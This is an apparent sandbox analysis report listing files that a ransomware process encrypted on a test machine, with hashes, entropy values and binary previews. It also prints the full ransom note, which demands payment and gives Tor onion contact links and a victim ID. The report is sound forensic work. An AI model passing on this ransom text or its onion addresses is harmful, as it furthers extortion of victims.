                                                                                                                                                      SHA-256:7882D277CC0F89A96C50F0FCDA81F59C3798A8865D5BCF329E3AB93070508946
                                                                                                                                                      SHA-512:733DB86A388C1C38F7569D73E5B20329B6C599E2CAB298CAD9A02CA7FF89C7754551D3532D69D2558DF9C205E5AD717482FEC76D7309B4B6480D7B8216C62125
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: %..'.p..>~Q?..~.....o...E.UN..E2......z..I9..6.........w.b..6Ce.....cB7.+..)....qQr.....' ..z.....%d[:..G...C.....~...4...(K.`.L..e.u:V.|.S~...;.y.,C.V.=....L..WW..P.=9....V.qY,/...'.1..m..5[...bw.S.P.......X.b...........~.~e.......u.....&..|....].Pu.p.v6k-.+...:..B...T..1v....oI..u. Lq..s.....x.N.y......0r...u....\d.*.$>....R..V.8.\j"7I.r...8....ip5...e....(.....8.T..]'....5n)._.~S..^......N....._...s.1-.>.N...}..f.L.|..p...#nd.{....q.haK..Q.9...,..Z...t@x..!B.."u/........y.{m.J.&..cd!|.FO;5.Mx..3...c.K.|..K..c...>....0..u.9(D.R..W.X..>..b9.o.|Sj(.C...r.E.E...H.s'.k..0,.....`.3.$.4..y...gx...]..! %..z3.R1O..7........L.r.C..-.m..1....[......4._.....*..r.N.....).T3....._bGZg~..m.bO...2.<0..=..M)E......2h.n .|..,].Q....7.E.B].%./...Dr..p..<..I ..%P...t....Q..Ez..u.l.#.C.h.U...M../|u,,.4.....(v..X......63{(..:.ha..T`..k.i.......".......z.s.9.o...a.@...o.,T..6.\..4.q..!u..$....m...;...I.d.7.*s.B...|MQ.........tX0?.H..;....|....j@..Y.":..W.G
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\BJZFPPWAPT.png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.001947248328085
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:GvxNpc6Lzp7GeBO0iTSTbPCqZXz05ZVzCwgck38in:GvxM6/tGtLTobfZXz05ZVzTEf
                                                                                                                                                      MD5:6FD60A06E077194F536FB6124C884AC2
                                                                                                                                                      SHA1:762FD2038F42883CDFB5333331EE52D5C54400D3
                                                                                                                                                      SHA-256:7882D277CC0F89A96C50F0FCDA81F59C3798A8865D5BCF329E3AB93070508946
                                                                                                                                                      SHA-512:733DB86A388C1C38F7569D73E5B20329B6C599E2CAB298CAD9A02CA7FF89C7754551D3532D69D2558DF9C205E5AD717482FEC76D7309B4B6480D7B8216C62125
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: %..'.p..>~Q?..~.....o...E.UN..E2......z..I9..6.........w.b..6Ce.....cB7.+..)....qQr.....' ..z.....%d[:..G...C.....~...4...(K.`.L..e.u:V.|.S~...;.y.,C.V.=....L..WW..P.=9....V.qY,/...'.1..m..5[...bw.S.P.......X.b...........~.~e.......u.....&..|....].Pu.p.v6k-.+...:..B...T..1v....oI..u. Lq..s.....x.N.y......0r...u....\d.*.$>....R..V.8.\j"7I.r...8....ip5...e....(.....8.T..]'....5n)._.~S..^......N....._...s.1-.>.N...}..f.L.|..p...#nd.{....q.haK..Q.9...,..Z...t@x..!B.."u/........y.{m.J.&..cd!|.FO;5.Mx..3...c.K.|..K..c...>....0..u.9(D.R..W.X..>..b9.o.|Sj(.C...r.E.E...H.s'.k..0,.....`.3.$.4..y...gx...]..! %..z3.R1O..7........L.r.C..-.m..1....[......4._.....*..r.N.....).T3....._bGZg~..m.bO...2.<0..=..M)E......2h.n .|..,].Q....7.E.B].%./...Dr..p..<..I ..%P...t....Q..Ez..u.l.#.C.h.U...M../|u,,.4.....(v..X......63{(..:.ha..T`..k.i.......".......z.s.9.o...a.@...o.,T..6.\..4.q..!u..$....m...;...I.d.7.*s.B...|MQ.........tX0?.H..;....|....j@..Y.":..W.G
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.03497390165805
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:BPC9UGktyUnMtgJR1DkrlQPzCwgck38RY3:BPCGtYtg/1DmiPzTEB
                                                                                                                                                      MD5:BBF8092A509686E1C1DE782BB643D40F
                                                                                                                                                      SHA1:C86AF76D6D62201BE0EEC4EAA8078F0311F89A61
                                                                                                                                                      SHA-256:262276C623635AE9D88699ACA32BC380D7AC1A4300379F64AF77E245AAA1585E
                                                                                                                                                      SHA-512:829C52A60E841161CBA655A6B00A0C423AA4AE06114ED5E365EEBFE373754E064712961A7EFF2BCAAC60A38571CE026457F2780F2578B3FCCB25D77BD1DAEA85
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .".}.....>...MU..O.?!."....o....2.b...N...9..dR.dY.$.&j...J.Fa0~&H..8..#7.p...a...;Vv8.0x ......,.(.~ITF;..@{......QT.F.|g...).{........\h.sx....<O......t..#....uWo.Sg.L..e.d[&FK...er..~.nw.dm...1...q.........._..|.k_#.g..K.vU....f.>.8..,..r"...J.d..<....x].....Up7o'....e<...d.4....2^h...s.[.....47>.......8<..N..6y....x..`...Q$.l..\./.'....T?.^.6.....z..Nj~.h..o.E......%.....%^&....k[............K.P.N{Yo..g..c.zS(.v.....ym.Qu...XK.uK.?...=/...f..l...p.....7a..Fo....y..p....J...!2+H.I .d...4^E..~._.c..v.!. .....;..Fv._.%#X.........-...R.[.v.<...!B....6...6$BM...*.e.....d.~..Q..E....v....s.?s....'..x....t..|.`.!.8.....N.:.+.../8.B.0jm...O$..*.`[`....+....v.u.w..b......o.u.b.#..ngh..T....h.31....#.v.b...t....ei~..{8.<.D.lI....+$x.`,..)FV"...;....X.D4._..k..E.../qK*.i5......K.:(.$..n$.~...o.r..(.c.1q&..#E........1.@u].V.{.....A..8 ...G.[.i...wF."..'.o.L.O.....g.....y.B....%..q.........C..4."=..~....2=.>#.N.:..P.h.%-q.TY.o.l....C.Fl.-..TX....
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.03497390165805
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:BPC9UGktyUnMtgJR1DkrlQPzCwgck38RY3:BPCGtYtg/1DmiPzTEB
                                                                                                                                                      MD5:BBF8092A509686E1C1DE782BB643D40F
                                                                                                                                                      SHA1:C86AF76D6D62201BE0EEC4EAA8078F0311F89A61
                                                                                                                                                      SHA-256:262276C623635AE9D88699ACA32BC380D7AC1A4300379F64AF77E245AAA1585E
                                                                                                                                                      SHA-512:829C52A60E841161CBA655A6B00A0C423AA4AE06114ED5E365EEBFE373754E064712961A7EFF2BCAAC60A38571CE026457F2780F2578B3FCCB25D77BD1DAEA85
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .".}.....>...MU..O.?!."....o....2.b...N...9..dR.dY.$.&j...J.Fa0~&H..8..#7.p...a...;Vv8.0x ......,.(.~ITF;..@{......QT.F.|g...).{........\h.sx....<O......t..#....uWo.Sg.L..e.d[&FK...er..~.nw.dm...1...q.........._..|.k_#.g..K.vU....f.>.8..,..r"...J.d..<....x].....Up7o'....e<...d.4....2^h...s.[.....47>.......8<..N..6y....x..`...Q$.l..\./.'....T?.^.6.....z..Nj~.h..o.E......%.....%^&....k[............K.P.N{Yo..g..c.zS(.v.....ym.Qu...XK.uK.?...=/...f..l...p.....7a..Fo....y..p....J...!2+H.I .d...4^E..~._.c..v.!. .....;..Fv._.%#X.........-...R.[.v.<...!B....6...6$BM...*.e.....d.~..Q..E....v....s.?s....'..x....t..|.`.!.8.....N.:.+.../8.B.0jm...O$..*.`[`....+....v.u.w..b......o.u.b.#..ngh..T....h.31....#.v.b...t....ei~..{8.<.D.lI....+$x.`,..)FV"...;....X.D4._..k..E.../qK*.i5......K.:(.$..n$.~...o.r..(.c.1q&..#E........1.@u].V.{.....A..8 ...G.[.i...wF."..'.o.L.O.....g.....y.B....%..q.........C..4."=..~....2=.>#.N.:..P.h.%-q.TY.o.l....C.Fl.-..TX....
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\EFOYFBOLXA.pdf
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.0252313674053415
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:2gcJN593vCIJnM5dgT37KheqzCwgck38VGn:NADxnntKheqzTEl
                                                                                                                                                      MD5:A419EE3887932A24BB47B5813B72D00B
                                                                                                                                                      SHA1:A689B57687D5A58E94020D6E0B396A36628B53AF
                                                                                                                                                      SHA-256:9449CC8E0482031E38CA1C6B55732117F632F4A74ADBB4AB7F7804FE482E3515
                                                                                                                                                      SHA-512:58E4BBA9DD6CAD02D2630E4E4B1C94468120215CAE144CE93A347C0F998012C78A0E84883DEBFE15EA924A8EA64B6A1C53458492607B72F42F2967795FD105A6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..l.].t..:..QPf.{.E.%....%.........iBW[..U....n;.R.;.fn60.?. P..g....}..,.....G./.....F..|D8.....[.).~Z...S.^GR|...(.#...Io...0.-.C.l.5j0z...+.Y....c.t..i8...K..K.K...v((C.Q..b8.e.....+..|..jd..5'....2...q....._.;....&5.....~.N...x.w|_%.U$..[..g..r....../.L..yK.^e..;..(.....wI.1..g...D\o..},....G.}.g..<R...N.v..\$....M....OY..\....8.I.J....P...]......O...F,KE43..r...-.)...F..Uppys.;.X.u3......g{cQ.)x......%...'.;.C..d'%.........N.z...mI.F4*..(.s...yr/...,..dbM]..Ki..*'..........aw7.W..nC..T...=..3U....$sC$...R..I.<..y..z.dZ.{...q...T.8L..#H....v..o.i..%.\...L...a.Z_...._.....!T...cz.:...I.e......a..3....1.....c.7^G.e......i.H.o}v..0...\..)$.....?O.9..(..)....h?.uPS{. .D......t....?....k,......+.q."..D..7\.....).R...BMb.&.Zc...y...h.9!Eb....6.c#...{]K.r.R.{.b.'..1.dC*..R......%B._}C....S\\h.].F.f..Hs......=Y.."E..o?-._.e..y...c.m....;B_Co..GL.q.(n..6......i+.s8...........F>......s...}.:4..cqtQ.......v).U..S.{..d...MZ@...R..e.(.K..|..FC.H
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\EFOYFBOLXA.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.0252313674053415
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:2gcJN593vCIJnM5dgT37KheqzCwgck38VGn:NADxnntKheqzTEl
                                                                                                                                                      MD5:A419EE3887932A24BB47B5813B72D00B
                                                                                                                                                      SHA1:A689B57687D5A58E94020D6E0B396A36628B53AF
                                                                                                                                                      SHA-256:9449CC8E0482031E38CA1C6B55732117F632F4A74ADBB4AB7F7804FE482E3515
                                                                                                                                                      SHA-512:58E4BBA9DD6CAD02D2630E4E4B1C94468120215CAE144CE93A347C0F998012C78A0E84883DEBFE15EA924A8EA64B6A1C53458492607B72F42F2967795FD105A6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..l.].t..:..QPf.{.E.%....%.........iBW[..U....n;.R.;.fn60.?. P..g....}..,.....G./.....F..|D8.....[.).~Z...S.^GR|...(.#...Io...0.-.C.l.5j0z...+.Y....c.t..i8...K..K.K...v((C.Q..b8.e.....+..|..jd..5'....2...q....._.;....&5.....~.N...x.w|_%.U$..[..g..r....../.L..yK.^e..;..(.....wI.1..g...D\o..},....G.}.g..<R...N.v..\$....M....OY..\....8.I.J....P...]......O...F,KE43..r...-.)...F..Uppys.;.X.u3......g{cQ.)x......%...'.;.C..d'%.........N.z...mI.F4*..(.s...yr/...,..dbM]..Ki..*'..........aw7.W..nC..T...=..3U....$sC$...R..I.<..y..z.dZ.{...q...T.8L..#H....v..o.i..%.\...L...a.Z_...._.....!T...cz.:...I.e......a..3....1.....c.7^G.e......i.H.o}v..0...\..)$.....?O.9..(..)....h?.uPS{. .D......t....?....k,......+.q."..D..7\.....).R...BMb.&.Zc...y...h.9!Eb....6.c#...{]K.r.R.{.b.'..1.dC*..R......%B._}C....S\\h.].F.f..Hs......=Y.."E..o?-._.e..y...c.m....;B_Co..GL.q.(n..6......i+.s8...........F>......s...}.:4..cqtQ.......v).U..S.{..d...MZ@...R..e.(.K..|..FC.H
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\GRXZDKKVDB.jpg
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.002308782181535
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:1Qt99V/gPSY4vGZ/xdecIqGH6c8zCwgck38gn:+t99SPSYqOxd7IUpzTEB
                                                                                                                                                      MD5:9F77D31F0BA38CC373B542E13766F4E1
                                                                                                                                                      SHA1:64D2E00DD9754E92EB52A67F90EFE394FA6AAD98
                                                                                                                                                      SHA-256:3C61FD5F7D01E2907204D6AAD909FE945BB0B24BA4A6082DB2BF62B583939290
                                                                                                                                                      SHA-512:4F6F47B5E5C31C2EFAEB19CB8A5826F0562FD656BABD0428D9E0209D23A6F1E17123670047C2A765AF6C8B256BD39CF666BFD383631D74F968D4AFC5C22FCB69
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .[...c.,.........&..]t.ZV......8..4.....S..!r}....q%.P..u.~4.n...m....+....=...........Q.......;./....b..n+v\..nDP.-.d~u.;.)I...e..W..yX..tj.Y..... A.<n.4...c."..JT....`D..R<.@8..>...Tuj......q....p..2.f[p1......Y.?..K.......DB.y.hxT.I[6A...}....d.!.o.v0.l).a...{X..T...p"..._.%....[....R.../g..".>>.Z...Z.d.X..Yj7T.<'...S<.>....1$..k./@.2.4..:............5.......0..1..?n.M.BF.r.`.....w.ke}....bG....6-.....\.hf.T ..Q?...P.@.<,!..p.....e..8.z"..Jk.-..1L 9.R..@........fK.4.g.K....+..1.}7.Os:y m.!......:.{3g/.o.2.../STXe.!.V........o.X_...^.k..W......S..I.L>r.,U..Xl.1....9..Z.t*/...r....d.Z^.o....A..ju3~j..6/..zl..Z....1HI.o..,...6.....tH*....Z@.U...._.:.BY.F.R...j..-.|....T!....vx.Gi.br.J.p....9.....e.$....B.N%..UC.k....Y}...h.....1.xLB...............Lq.O.4./...4....Wo.16..v......M...A.kr....kx....Z..G...K.|t#...GVd....=.,}.[..g.f...O.O.g.D..WA<.0..=?.%L..@.....VI.a.<.....=.1...%{.g..Mfl'4:*.y...!...Z.W..z00..Fp...p...f[...,}p4Zm.M....$.*..
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\GRXZDKKVDB.jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.002308782181535
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:1Qt99V/gPSY4vGZ/xdecIqGH6c8zCwgck38gn:+t99SPSYqOxd7IUpzTEB
                                                                                                                                                      MD5:9F77D31F0BA38CC373B542E13766F4E1
                                                                                                                                                      SHA1:64D2E00DD9754E92EB52A67F90EFE394FA6AAD98
                                                                                                                                                      SHA-256:3C61FD5F7D01E2907204D6AAD909FE945BB0B24BA4A6082DB2BF62B583939290
                                                                                                                                                      SHA-512:4F6F47B5E5C31C2EFAEB19CB8A5826F0562FD656BABD0428D9E0209D23A6F1E17123670047C2A765AF6C8B256BD39CF666BFD383631D74F968D4AFC5C22FCB69
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .[...c.,.........&..]t.ZV......8..4.....S..!r}....q%.P..u.~4.n...m....+....=...........Q.......;./....b..n+v\..nDP.-.d~u.;.)I...e..W..yX..tj.Y..... A.<n.4...c."..JT....`D..R<.@8..>...Tuj......q....p..2.f[p1......Y.?..K.......DB.y.hxT.I[6A...}....d.!.o.v0.l).a...{X..T...p"..._.%....[....R.../g..".>>.Z...Z.d.X..Yj7T.<'...S<.>....1$..k./@.2.4..:............5.......0..1..?n.M.BF.r.`.....w.ke}....bG....6-.....\.hf.T ..Q?...P.@.<,!..p.....e..8.z"..Jk.-..1L 9.R..@........fK.4.g.K....+..1.}7.Os:y m.!......:.{3g/.o.2.../STXe.!.V........o.X_...^.k..W......S..I.L>r.,U..Xl.1....9..Z.t*/...r....d.Z^.o....A..ju3~j..6/..zl..Z....1HI.o..,...6.....tH*....Z@.U...._.:.BY.F.R...j..-.|....T!....vx.Gi.br.J.p....9.....e.$....B.N%..UC.k....Y}...h.....1.xLB...............Lq.O.4./...4....Wo.16..v......M...A.kr....kx....Z..G...K.|t#...GVd....=.,}.[..g.f...O.O.g.D..WA<.0..=?.%L..@.....VI.a.<.....=.1...%{.g..Mfl'4:*.y...!...Z.W..z00..Fp...p...f[...,}p4Zm.M....$.*..
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\NVWZAPQSQL.xlsx
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.010247895943315
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:kur1wy8lu/DWRHwklq3Bfh8GO9Qbrp8FzCwgck38/m:kurD0u/D+5q3BJ859QbreFzTEom
                                                                                                                                                      MD5:12F08F524A18A2502C5C89C372295F27
                                                                                                                                                      SHA1:7D20F2B121433DB9A759C20B56B88D13E5F0CA6A
                                                                                                                                                      SHA-256:CFAC2D1DA6A63D3A8731817C70E3194C6741473F559336D2EEBFD78FDD8CFA2E
                                                                                                                                                      SHA-512:6EDF7DA031AD7A5B8BFBE028857E9A2DAD25077DD9E56423AF1253F36EC52B10EFB1EF32D13932DD012C2932A82D213B8C5DC2E2711E6A3C50072EF7013896CF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......~.H.V...95..b_.{l]X.QD..h.r.1..iiA}.s..n..!...@.Y.5o.....:.>.3.v...../\.K(3 .=r.`..M......p.Y.v.].....>.2.\.w.D-..wC...KiFj/Al8.S..*.$._.BS...d|.w%%g.`.mS...w.o.v..q.F.q*G...%..x'......?.m@...^m..V.L...e.~(.......8Y.....e6|.yB.....L....D~....5.,...J......[.HV5x.......=.....(~{...C... )....ef.hi....EC|K7~~......M"T..YV$.)i7gE......e~]T.-.f.z}.....l.?X..P.\.>._THO. ...-..\.{.'g.......r5.Sd...........;..Z....7L..i.(.,W..2<..LW>...v.J....k...5^.KH.C...w.|.n....V...X.N....uv..fq..g.;..~.........%O..t...(b.....TV.....S....K69r.gt$s.,.......v.....-.......:3.e-..d.].A7.5.\..lX..S.P..TTQ.......^.....o}...S..<.....:..T.E..?.X.......w.=.]%..%}a.k.1..KZ0U. .........Z.w..Q.k..=9..j{..x;V....$....[Z.w*..q`...g...-..6^...;....x....P..G.=....9..5.,...bn...z>.;..`....I..Y.z|...m8._g..W9........5...I.>...Q.2+.).>.m^.g.XU).P. ...33:.\......(7......^ba(.=NT/9m..M...8%.....`yc.....`C.-......!....T.0..|.....G...S..6.j...{..ig&...).kV..l7].....]..vD...r.......GkC..
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\NVWZAPQSQL.xlsx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.010247895943315
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:kur1wy8lu/DWRHwklq3Bfh8GO9Qbrp8FzCwgck38/m:kurD0u/D+5q3BJ859QbreFzTEom
                                                                                                                                                      MD5:12F08F524A18A2502C5C89C372295F27
                                                                                                                                                      SHA1:7D20F2B121433DB9A759C20B56B88D13E5F0CA6A
                                                                                                                                                      SHA-256:CFAC2D1DA6A63D3A8731817C70E3194C6741473F559336D2EEBFD78FDD8CFA2E
                                                                                                                                                      SHA-512:6EDF7DA031AD7A5B8BFBE028857E9A2DAD25077DD9E56423AF1253F36EC52B10EFB1EF32D13932DD012C2932A82D213B8C5DC2E2711E6A3C50072EF7013896CF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......~.H.V...95..b_.{l]X.QD..h.r.1..iiA}.s..n..!...@.Y.5o.....:.>.3.v...../\.K(3 .=r.`..M......p.Y.v.].....>.2.\.w.D-..wC...KiFj/Al8.S..*.$._.BS...d|.w%%g.`.mS...w.o.v..q.F.q*G...%..x'......?.m@...^m..V.L...e.~(.......8Y.....e6|.yB.....L....D~....5.,...J......[.HV5x.......=.....(~{...C... )....ef.hi....EC|K7~~......M"T..YV$.)i7gE......e~]T.-.f.z}.....l.?X..P.\.>._THO. ...-..\.{.'g.......r5.Sd...........;..Z....7L..i.(.,W..2<..LW>...v.J....k...5^.KH.C...w.|.n....V...X.N....uv..fq..g.;..~.........%O..t...(b.....TV.....S....K69r.gt$s.,.......v.....-.......:3.e-..d.].A7.5.\..lX..S.P..TTQ.......^.....o}...S..<.....:..T.E..?.X.......w.=.]%..%}a.k.1..KZ0U. .........Z.w..Q.k..=9..j{..x;V....$....[Z.w*..q`...g...-..6^...;....x....P..G.=....9..5.,...bn...z>.;..`....I..Y.z|...m8._g..W9........5...I.>...Q.2+.).>.m^.g.XU).P. ...33:.\......(7......^ba(.=NT/9m..M...8%.....`yc.....`C.-......!....T.0..|.....G...S..6.j...{..ig&...).kV..l7].....]..vD...r.......GkC..
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\PALRGUCVEH.mp3
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.966326113067986
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:2xT2rLOiY05+JkzqKtHXLrZRxmQwXtCBA3J1PcDbUo4rvFUzK8sevWAVgKTaCB7x:kyGi0AqKt3PZ76t5AeLyzCwgck38MGn
                                                                                                                                                      MD5:5F0AD5D70677FEA929AEA3229199DD11
                                                                                                                                                      SHA1:826C84196D8D85ACD8BFBAF578B86EA39D00833F
                                                                                                                                                      SHA-256:CCD3F2CFD92DDA3707560CF35DCC6C40D07523151650A40516318A12142F9F78
                                                                                                                                                      SHA-512:71803ADF5A019BB6687FD28D8F5F012FB86DBCD8FA51C1C118C501E8A11B67E0CE9EAFEE1387DF5F94F8530797B691315B379D445ED1EBFCEB2CBB6AC0EAE550
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .UQ.YV.....B&....J.kLa.f..&[.}...!...qy'J..@c;7p.K.*..C.K.5A...~A].;.Q..2.6..A.4...y..7'.<.....w"k. .e*;...M...]{;G..ET.....$J.o.....L..}.I....8..\...e.#.:......PcF?.h...a!.e.<.t'..y.F..."+...N('......9.9+.._ ib....mB#D.........._U.rHzJ;|,?...CX)W...>u.Y..........O...`;i...<~...R......6.5<..U)....4.|....j..[....V.l....aZ.....$...p.....D_N....".B.;V.YuaC.g.~..S..8Yd.H.m....f.v4Z;R.E.[.eJ....l7.!..Yq..F.......530......#@ubH.....|.....a.H..\*B..qq....3h......i.......K...*DJ8....#.).T..QFHKp...."......w$..|...k..Pf............C`...E.)..G.K.V=c8{..D..W.+L..4.7.3.G...3"..m0..>......y..`#..$.B.n...@.9..cS.Y.uN`|...#f..AN9...\...V. }..z..?i.FCU6..4. ....[+.H0p%.[2s.VL.....(2.RLk.i.d5Y..^.../..~E..~.64..tq........d.v0.=.k..)~,...b....q...?../.up.2......P\.G.<...R..[.d#/F\.....].I.+.>57.~...^<...-....u.,.oG........t.3~W..2,\...DH....1c. .Lw.u..Y...TL...B..CI...F.;0e.....zI.s..........E....u...P.-..Q.M.Az..W.._Y..}..J.....@.
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\PALRGUCVEH.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.966326113067986
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:2xT2rLOiY05+JkzqKtHXLrZRxmQwXtCBA3J1PcDbUo4rvFUzK8sevWAVgKTaCB7x:kyGi0AqKt3PZ76t5AeLyzCwgck38MGn
                                                                                                                                                      MD5:5F0AD5D70677FEA929AEA3229199DD11
                                                                                                                                                      SHA1:826C84196D8D85ACD8BFBAF578B86EA39D00833F
                                                                                                                                                      SHA-256:CCD3F2CFD92DDA3707560CF35DCC6C40D07523151650A40516318A12142F9F78
                                                                                                                                                      SHA-512:71803ADF5A019BB6687FD28D8F5F012FB86DBCD8FA51C1C118C501E8A11B67E0CE9EAFEE1387DF5F94F8530797B691315B379D445ED1EBFCEB2CBB6AC0EAE550
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .UQ.YV.....B&....J.kLa.f..&[.}...!...qy'J..@c;7p.K.*..C.K.5A...~A].;.Q..2.6..A.4...y..7'.<.....w"k. .e*;...M...]{;G..ET.....$J.o.....L..}.I....8..\...e.#.:......PcF?.h...a!.e.<.t'..y.F..."+...N('......9.9+.._ ib....mB#D.........._U.rHzJ;|,?...CX)W...>u.Y..........O...`;i...<~...R......6.5<..U)....4.|....j..[....V.l....aZ.....$...p.....D_N....".B.;V.YuaC.g.~..S..8Yd.H.m....f.v4Z;R.E.[.eJ....l7.!..Yq..F.......530......#@ubH.....|.....a.H..\*B..qq....3h......i.......K...*DJ8....#.).T..QFHKp...."......w$..|...k..Pf............C`...E.)..G.K.V=c8{..D..W.+L..4.7.3.G...3"..m0..>......y..`#..$.B.n...@.9..cS.Y.uN`|...#f..AN9...\...V. }..z..?i.FCU6..4. ....[+.H0p%.[2s.VL.....(2.RLk.i.d5Y..^.../..~E..~.64..tq........d.v0.=.k..)~,...b....q...?../.up.2......P\.G.<...R..[.d#/F\.....].I.+.>57.~...^<...-....u.,.oG........t.3~W..2,\...DH....1c. .Lw.u..Y...TL...B..CI...F.;0e.....zI.s..........E....u...P.-..Q.M.Az..W.._Y..}..J.....@.
                                                                                                                                                      C:\Users\user\Desktop\EEGWXUHVUG\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Desktop\EFOYFBOLXA.pdf
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
